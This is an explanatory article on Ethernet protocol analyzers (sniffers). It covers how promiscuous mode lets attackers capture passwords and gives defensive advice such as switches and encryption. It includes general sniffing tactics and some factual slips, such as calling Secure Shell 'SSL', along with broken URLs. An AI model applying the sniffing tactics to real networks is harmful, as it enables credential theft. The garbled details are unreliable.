Protocol analyzers.
Ethernet networks have gained immense popularity due to their good throughput, ease of installation, and affordable cost of network equipment.
However, Ethernet technology is not without significant drawbacks.
The main one is the insecurity of the transmitted information. Computers connected to an Ethernet network are able to intercept information addressed to their neighbors. The reason for this is the so-called broadcast messaging mechanism adopted in Ethernet networks
Local Broadcast
In an Ethernet-type network, computers connected to it typically share a single cable, which serves as a medium for sending messages between them.
Anyone wishing to send a message over a shared channel must first make sure that the channel is free at the moment.
Once the computer has started transmitting, it listens to the carrier frequency of the signal, determining whether the signal has been distorted by collisions with other computers that are transmitting their data at the same time.
If there is a collision, the transmission is interrupted and the computer «goes silent» for a certain period of time in order to try to repeat the transmission a little later.
If a computer connected to an Ethernet network does not transmit anything itself, it nevertheless continues to «listen» to all messages transmitted over the network by neighboring computers.
Having noticed its network address in the header of the received portion of data, the computer copies this portion into its local memory.
There are two main ways to connect computers into an Ethernet network.
In the first case, computers are connected using a coaxial cable.
This cable snakes like a black snake from computer to computer, connecting to network adapters with a T-shaped connector. In professional language, this topology is called an Ethernet 10Base2 network. However, it can also be called a network in which «everyone hears everyone else».
Any computer connected to the network is able to intercept data sent over this network by another computer.
In the second case, each computer is connected with a twisted pair cable to a separate port of the central switching device — a hub or a switch.
In such networks, which are called Ethernet lOBaseT networks, computers are divided into groups called collision domains.
Collision domains are defined by ports on a hub or switch that are connected to a common bus.
As a result, collisions do not occur between all computers on the network, but individually — between those that are part of the same collision domain, which increases the network's throughput as a whole.
Recently, large networks have begun to see the emergence of new types of switches that do not use broadcasting and do not connect groups of ports to each other.
Instead, all data transmitted over the network is buffered in memory and sent as soon as possible. However, there are still very few such networks — no more than 10% of the total number of Ethernet-type networks.
Thus, the data transmission algorithm adopted in the vast majority of Ethernet networks requires that each computer connected to the network continuously «listen» to all network traffic without exception.
The proposed access algorithms, which would disconnect computers from the network while transmitting «foreign» messages, remained unimplemented due to their excessive complexity and low efficiency.
The protocol analyzer as it is
The network adapter of each computer in an Ethernet network, as a rule, «hears» everything that its neighbors on the segment of this network «talk» about among themselves.
But it processes and places in its local memory only those portions (the so-called frames) of data that contain the unique address assigned to it in the network.
In addition to this, the vast majority of modern Ethernet adapters allow operation in a special mode called promiscuous, when using which the adapter copies all data frames transmitted over the network without exception to the local memory of the computer.
Specialized programs that put the network adapter into promiscuous mode and collect all network traffic for subsequent analysis are called protocol analyzers.
The latter are widely used by network administrators to monitor the operation of these networks and identify their overloaded sections, which negatively affect the speed of data transfer.
Unfortunately, protocol analyzers are also used by intruders, who can use them to intercept other people's passwords and other confidential information.
It should be noted that protocol analyzers pose a serious danger. The very presence of a protocol analyzer in the network indicates that there is a gap in its defense mechanisms. The protocol analyzer could have been installed by an outsider who penetrated the network from the outside (for example, if the network has access to the Internet).
But this could also have been the work of a «homegrown» intruder who has legal access to the network. In any case, the current situation should be taken very seriously. Computer security experts classify attacks on computers using protocol analyzers as so-called second-level attacks.
This means that a computer hacker has already managed to penetrate the network's defenses and is now looking to build on his success. Using a protocol analyzer, he can try to intercept users' login names and passwords, their sensitive financial data (such as credit card numbers), and confidential communications (such as email).
Given sufficient resources, a computer hacker can, in principle, intercept all information transmitted over a network.
Protocol analyzers exist for every platform. But even if it turns out that a protocol analyzer has not yet been written for a particular platform, the threat posed by an attack on a computer system using a protocol analyzer still has to be taken into account.
The point is that protocol analyzers analyze protocols, not specific computers. Therefore, a protocol analyzer can «build» a nest for itself in any network node and from there intercept network traffic that, as a result of broadcasts, reaches every computer connected to the network.
Universities are the most common targets for computer hackers to attack using protocol analyzers. If only because of the huge number of different logins and passwords that can be stolen during such an attack. Using a protocol analyzer in practice is not as easy as it may seem.
To benefit from a protocol analyzer, a computer hacker must have sufficient knowledge of networking technologies. It is not possible to simply install and run a protocol analyzer, since even in a small local network of five computers, the traffic is thousands and thousands of packets per hour. Consequently, in a short time, the output of the protocol analyzer will fill the «hard» disk «to the brim».
That's why a computer hacker will typically set up a protocol analyzer to only intercept the first 200-300 bytes of each packet sent over the network. It's usually the packet header that contains the username and password information that the hacker is most interested in.
However, if the hacker has enough space on the hard drive, then increasing the volume of traffic he intercepts will only benefit him and allow him to learn a lot of interesting things.
There are many protocol analyzers available on servers on the Internet, which differ only in the set of available functions. A search for the queries «protocol analyzer» and «sniffer» on the softseek server gives links to a good dozen software packages.
For computers running Windows operating systems, some of the best protocol analyzers are Lan Explorer from Intellimax and NetXRay from Network Associates. NetXRay (translated from English as «Network X-ray») has an extensive set of functions that allow you to take a snapshot of the «insides» of an Ethernet network, determine which of its nodes and segments are carrying the greatest load, compile reports and build diagrams based on the data obtained. A free version of NetXRay is available on the Internet at http://nai/asp_set/products/tnv/snitierbasicJntro.asp.
Lan Explorer Protocol Analyzer («LAN Analyzer») is not inferior in its functionality to NetXRay, has a very good user interface, is convenient and easy to use. A 15-day trial version of Lan Explorer is available at http://intellimax/ftpsites.htm.
The Network Monitor protocol analyzer is also included in the Windows NT Server operating system from Microsoft. To install it, double-click the Network icon in the Control Panel, then go to the Services tab, click the Add button, and select Network Monitor Tools and Agent in the dialog box that appears. After installation, the protocol analyzer can be launched from the Programs menu in the Administrative Tools section.
How to protect yourself from the protocol analyzer
Let's make one thing clear right away — only those who want to fight back against computer hackers who use protocol analyzers to organize attacks on computer systems connected to the network need advice on how to protect themselves from a protocol analyzer. In the hands of a network administrator, a protocol analyzer is a very useful tool that helps him find and fix problems, get rid of bottlenecks that reduce network throughput, and promptly detect the penetration of computer hackers into it.
Here is some advice. First, try to get a network adapter that fundamentally cannot function in promiscuous mode. Such adapters do exist. Some of them do not support promiscuous mode at the hardware level (they are a minority), while the rest are simply supplied with a driver that does not allow operation in promiscuous mode, although this mode is implemented in hardware. To find an adapter that does not have a promiscuous mode, it is enough to contact the technical support service of any company that sells protocol analyzers and find out which adapters their software packages do not work with. Second, given that the PC99 specification, prepared in the depths of Microsoft and Intel corporations, requires the unconditional presence of a promiscuous mode in a network card, purchase a modern network intelligent switch that buffers the message transmitted over the network in memory and sends it, if possible, precisely to the address. Thus, the need for «listening» adapter of all traffic in order to extract messages from it, the addressee of which is this computer, is eliminated.
Thirdly, do not allow unauthorized installation of protocol analyzers on network computers. Here, you should use tools from the arsenal that is used to combat software bookmarks and, in particular, Trojan programs (installation of firewalls). Fourthly, encrypt all network traffic. There is a wide range of software packages that allow you to do this quite effectively and reliably. For example, the ability to encrypt mail passwords is provided by an add-on to the POP (Post Office Protocol) mail protocol — the APOP (Authentication POP) protocol. When working with APOP, a new encrypted combination is transmitted over the network each time, which does not allow an intruder to extract any practical benefit from information intercepted using a protocol analyzer. The only problem is that today not all mail servers and clients support APOP.
Another product called Secure Shell, or SSL for short, was originally developed by the Finnish company SSH Communications Security (http://ssh.fi) and currently has many implementations available for free on the Internet. SSL is a secure protocol for securely transmitting messages over a computer network using encryption.
Particularly well-known are software packages designed to protect data transmitted over a network by encryption and united by the presence of the abbreviation PGP in their name, which stands for Pretty Good Privacy. Information about these packages can be found on the Internet at http://nai/asp_set/products/ins/intro.asp. Unfortunately, the freely distributed version of the encryption program from this series available on this server is only available to residents of the USA and Canada, as well as to lucky Muscovites who have become owners of pirated CDs, on which it can be accidentally found from time to time. •